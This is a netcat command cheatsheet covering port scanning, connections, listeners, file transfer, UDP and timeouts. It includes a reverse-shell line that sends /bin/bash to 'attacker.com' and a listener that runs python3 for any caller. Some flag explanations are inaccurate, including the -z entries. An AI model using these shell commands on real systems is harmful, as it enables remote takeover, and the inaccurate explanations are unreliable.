Cheatsheet & Examples: nc

Port Scanning

Example Usage:
nc -zv example.com 80 443

What it does:
Scans specified ports on a target host to determine if they are open. The -z option suppresses connection attempts, and -v provides verbose output.

Command-line Arguments Explained:

• -z: Enables zero-I/O mode, used for port scanning without establishing a connection.
• -v: Enables verbose mode to display detailed information about the scan.
• example.com: Target hostname or IP address.
• 80 443: Port numbers to scan.

---

Connecting to a Remote Server

Example Usage:
nc example.com 80

What it does:
Establishes a TCP connection to a remote server on a specified port, allowing data to be sent or received.

Command-line Arguments Explained:

• example.com: Target hostname or IP address.
• 80: Port number to connect to.

---

Listening for Incoming Connections

Example Usage:
nc -l 8080

What it does:
Listens for incoming TCP connections on a specified port, acting as a simple server.

Command-line Arguments Explained:

• -l: Enables listening mode (server).
• 8080: Port number to listen on.

---

File Transfer Between Machines

Example Usage:
Receiver: nc -l 9999 > received_file.txt
Sender: nc 192.168.1.1 9999 < send_file.txt

What it does:
Transfers files between two machines over a network by using Netcat as a data conduit.

Command-line Arguments Explained:

• -l: Enables listening mode on the receiver.
• 9999: Port number for the transfer.
• > received_file.txt: Redirects received data to a file.
• < send_file.txt: Sends the contents of a file to the remote host.

---

Sending Data to a Server

Example Usage:
echo "GET / HTTP/1.1" | nc example.com 80

What it does:
Sends raw data (e.g., HTTP requests) to a server via a TCP connection.

Command-line Arguments Explained:

• example.com: Target hostname or IP address.
• 80: Port number to send data to.

---

UDP Communication

Example Usage:
nc -u 192.168.1.1 53

What it does:
Establishes a UDP connection to a remote host, useful for testing DNS or other UDP-based services.

Command-line Arguments Explained:

• -u: Specifies UDP protocol instead of TCP.
• 192.168.1.1: Target hostname or IP address.
• 53: Port number (e.g., DNS).

---

Reverse Shell (Security Use Case)

Example Usage:
nc -e /bin/bash attacker.com 4444

What it does:
Connects to a remote host (e.g., an attacker’s machine) and provides a shell, often used for reverse connections in penetration testing.

Command-line Arguments Explained:

• -e: Executes the specified command (e.g., /bin/bash) after connecting.
• attacker.com: Target hostname or IP address.
• 4444: Port number to connect to.

---

Timeouts and Connection Management

Example Usage:
nc -w 5 example.com 22

What it does:
Sets a timeout for connection attempts or data transfers. If no response is received within the timeout, the command exits.

Command-line Arguments Explained:

• -w 5: Sets a 5-second timeout for the connection.
• example.com: Target host.
• 22: Port number (e.g., SSH).

---

Using Source IP/Port

Example Usage:
nc -s 192.168.1.100 -p 5000 example.com 80

What it does:
Specifies a source IP address and port for outgoing connections, useful for testing network interfaces or bypassing firewall rules.

Command-line Arguments Explained:

• -s 192.168.1.100: Sets the source IP address.
• -p 5000: Sets the source port.
• example.com: Target host.
• 80: Target port.

---

Creating a Simple Chat Server

Example Usage:
Receiver: nc -l 1234
Sender: nc 192.168.1.1 1234

What it does:
Establishes a basic two-way communication channel between two machines, useful for ad-hoc chat or testing.

Command-line Arguments Explained:

• -l: Enables listening mode on the receiver.
• 1234: Port number for the chat channel.
• 192.168.1.1: Receiver’s IP address (sender’s target).

---

Redirecting Output to a File

Example Usage:
nc 192.168.1.1 80 > output.html

What it does:
Saves the data received from a remote server (e.g., an HTTP response) to a local file.

Command-line Arguments Explained:

• 192.168.1.1: Target host.
• 80: Port number.
• > output.html: Redirects the received data to a file.

---

Listening with Keep-Alive (-k)

Example Usage:
nc -l -k 9999

What it does:
Listens for incoming connections and stays active after each connection is closed, allowing continuous use.

Command-line Arguments Explained:

• -l: Enables listening mode.
• -k: Keeps the listener running after a connection ends.
• 9999: Port number.

---

Testing HTTP Servers

Example Usage:
nc example.com 80
Then type GET / HTTP/1.1 and press Enter twice.

What it does:
Manually interacts with an HTTP server to test responses or troubleshoot issues.

Command-line Arguments Explained:

• example.com: Target hostname.
• 80: Port for HTTP.

---

Basic Data Relay

Example Usage:
nc -u -z 192.168.1.1 53

What it does:
Relays data between hosts using UDP, useful for simple network testing or packet forwarding.

Command-line Arguments Explained:

• -u: Uses UDP protocol.
• -z: Scans the port without sending data.
• 192.168.1.1: Target host.
• 53: Port for DNS or UDP service.

---

Running Commands on Connection

Example Usage:
nc -l -p 8080 -e /usr/bin/python3

What it does:
Starts a listener on a port and executes a command (e.g., a Python script) when a connection is made.

Command-line Arguments Explained:

• -l: Enables listening mode.
• -p 8080: Specifies the port to listen on.
• -e /usr/bin/python3: Executes the given command upon connection.